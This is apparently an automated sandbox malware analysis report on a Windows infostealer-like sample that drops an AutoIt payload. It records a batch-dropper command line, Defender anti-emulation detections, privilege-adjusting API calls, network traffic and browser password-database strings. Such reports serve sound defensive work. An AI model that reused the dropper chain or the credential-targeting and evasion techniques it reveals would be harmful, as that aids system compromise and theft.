                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: KEBKJD.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Neo.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.drString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: KEBKJD.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/BFIDGCGDHJ
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59948
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59943
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59952
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59948 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59952 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59957
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59959
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59959 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59960
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59955 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59943 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59937 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59960 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59957 -> 443
                    Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:59937 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.130.188.148:443 -> 192.168.2.5:59938 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B14830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00B14830
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B14632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00B14632
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B2D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00B2D164

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC0E38 FindCloseChangeNotification,NtProtectVirtualMemory,11_2_00AC0E38
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B042D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00B042D5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00AF8F2E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B05778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00B05778
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\OpenedResearcherJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SimonAmountsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAB02011_2_00AAB020
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA94E011_2_00AA94E0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA9C8011_2_00AA9C80
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC23F511_2_00AC23F5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B2840011_2_00B28400
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD650211_2_00AD6502
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAE6F011_2_00AAE6F0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD265E11_2_00AD265E
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC282A11_2_00AC282A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD89BF11_2_00AD89BF
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B20A3A11_2_00B20A3A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD6A7411_2_00AD6A74
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB0BE011_2_00AB0BE0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AFEDB211_2_00AFEDB2
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACCD5111_2_00ACCD51
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B20EB711_2_00B20EB7
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B08E4411_2_00B08E44
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD6FE611_2_00AD6FE6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC33B711_2_00AC33B7
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACF40911_2_00ACF409
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABD45D11_2_00ABD45D
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAF6A011_2_00AAF6A0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC16B411_2_00AC16B4
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABF62811_2_00ABF628
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA166311_2_00AA1663
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC78C311_2_00AC78C3
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC1BA811_2_00AC1BA8
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACDBA511_2_00ACDBA5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD9CE511_2_00AD9CE5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABDD2811_2_00ABDD28
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC1FC011_2_00AC1FC0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACBFD611_2_00ACBFD6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AC8B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AB1A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AC0D17 appears 70 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 58 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                    Source: file.exe, 00000000.00000002.2014158848.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/36@3/3
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0A6AD GetLastError,FormatMessageW,11_2_00B0A6AD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF8DE9 AdjustTokenPrivileges,CloseHandle,11_2_00AF8DE9
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00AF9399
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B04148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00B04148
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00B0443D
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199761128941[1].htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDA49.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: CBKJJJ.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
